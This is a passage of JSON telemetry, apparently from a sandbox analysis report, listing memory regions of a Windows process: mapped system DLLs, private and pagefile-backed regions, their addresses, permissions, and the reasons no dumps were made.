"lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3602", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3603", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_3604", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_3605", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3606", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3607", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:05:18.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7831551, "entry_point": 0, "filename": null, "id": "region_3608", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:05:18.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3609", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:05:18.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3610", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:05:18.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_3611", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:05:18.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_3612", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:18.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 9441279, "entry_point": 0, "filename": null, "id": "region_3613", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:05:18.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 30474239, "entry_point": 0, "filename": null, "id": "region_3614", "name": "pagefile_0x0000000000910000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9502720, "timestamp": "00:05:18.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1769472, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_3615", "name": "private_0x0000000001d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 30474240, "timestamp": "00:05:18.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 36438015, "entry_point": 0, "filename": null, "id": "region_3616", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:05:18.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36438016, "type": "region", "version": 1 }, "end_va": 39383039, "entry_point": 36438016, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3617", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36438016, "timestamp": "00:05:18.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1179648, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 31653887, "entry_point": 0, "filename": null, "id": "region_3618", "name": "private_0x0000000001d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 30474240, "timestamp": "00:05:18.096", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_3619", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:05:18.096", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1572864, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 40959999, "entry_point": 0, "filename": null, "id": "region_3620", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:05:18.096", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1948450815, "entry_point": 1947926528, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_3621", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:05:18.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2031616, "start_va": 40960000, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_3622", "name": "private_0x0000000002710000", "norm_filename": null, "region_type": "private_memory", "start_va": 40960000, "timestamp": "00:05:18.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3862527, "entry_point": 0, "filename": null, "id": "region_3623", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:05:18.102", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1179648, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 40566783, "entry_point": 0, "filename": null, "id": "region_3624", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:05:18.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 40959999, "entry_point": 0, "filename": null, "id": "region_3625", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:05:18.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_3626", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:05:18.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961422847, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\sxs.dll", "id": "region_3627", "name": "sxs.dll", "norm_filename": "c:\\windows\\syswow64\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:05:18.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1947402240, "type": "region", "version": 1 }, "end_va": 1947480063, "entry_point": 1947402240, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_3628", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1947402240, "timestamp": "00:05:18.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2256895, "entry_point": 0, "filename": null, "id": "region_3629", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:05:18.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_3630", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:05:18.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 47132671, "entry_point": 0, "filename": null, "id": "region_3631", "name": "pagefile_0x0000000002900000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42991616, "timestamp": "00:05:18.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 47185920, "type": "region", "version": 1 }, "end_va": 56819711, "entry_point": 47185920, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_3632", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 47185920, "timestamp": "00:05:18.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_3633", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:05:18.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_3634", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:05:19.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3635", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:05:19.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1969946624, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1969946624, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_3727", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1969946624, "timestamp": "00:05:27.976", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1988034560, "type": "region", "version": 1 }, "end_va": 1988059135, "entry_point": 1988034560, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3728", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1988034560, "timestamp": "00:05:27.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970171903, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_3729", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:05:27.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2392063, "entry_point": 0, "filename": null, "id": "region_3730", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:05:27.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962811391, "entry_point": 1962737664, "filename": "\\Windows\\SysWOW64\\dhcpcsvc.dll", "id": "region_3731", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\syswow64\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:05:27.981", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 2004746240, "type": "region", "version": 1 }, "end_va": 2004963327, "entry_point": 2004746240, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3732", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 2004746240, "timestamp": "00:05:27.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1572864, "start_va": 40960000, "type": "region", "version": 1 }, "end_va": 42532863, "entry_point": 0, "filename": null, "id": "region_3733", "name": "private_0x0000000002710000", "norm_filename": null, "region_type": "private_memory", "start_va": 40960000, "timestamp": "00:05:27.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42729472, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_3734", "name": "private_0x00000000028c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42729472, "timestamp": "00:05:27.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_3735", "name": "private_0x0000000001d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 30474240, "timestamp": "00:05:27.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 31653887, "entry_point": 0, "filename": null, "id": "region_3736", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:05:27.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 40435711, "entry_point": 0, "filename": null, "id": "region_3737", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:05:27.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 40501248, "type": "region", "version": 1 }, "end_va": 40566783, "entry_point": 0, "filename": null, "id": "region_3738", "name": "private_0x00000000026a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40501248, "timestamp": "00:05:27.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3739", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:05:27.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 56819712, "type": "region", "version": 1 }, "end_va": 191037439, "entry_point": 0, "filename": null, "id": "region_3740", "name": "private_0x0000000003630000", "norm_filename": null, "region_type": "private_memory", "start_va": 56819712, "timestamp": "00:05:28.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_3741", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:05:28.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_3742", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:05:28.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_3743", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:05:28.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_3744", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:05:28.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_3745", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:05:28.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_3746", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:05:28.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_3747", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:05:28.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3748", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:05:28.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 851968, "start_va": 40960000, "type": "region", "version": 1 }, "end_va": 41811967, "entry_point": 0, "filename": null, "id": "region_3749", "name": "private_0x0000000002710000", "norm_filename": null, "region_type": "private_memory", "start_va": 40960000, "timestamp": "00:05:28.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42532863, "entry_point": 0, "filename": null, "id": "region_3750", "name": "private_0x0000000002850000", "norm_filename": null, "region_type": "private_memory", "start_va": 42270720, "timestamp": "00:05:28.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3751", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:05:28.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30982143, "entry_point": 30736384, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3752", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 30736384, "timestamp": "00:05:28.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3757", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, "timestamp": "00:05:28.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": 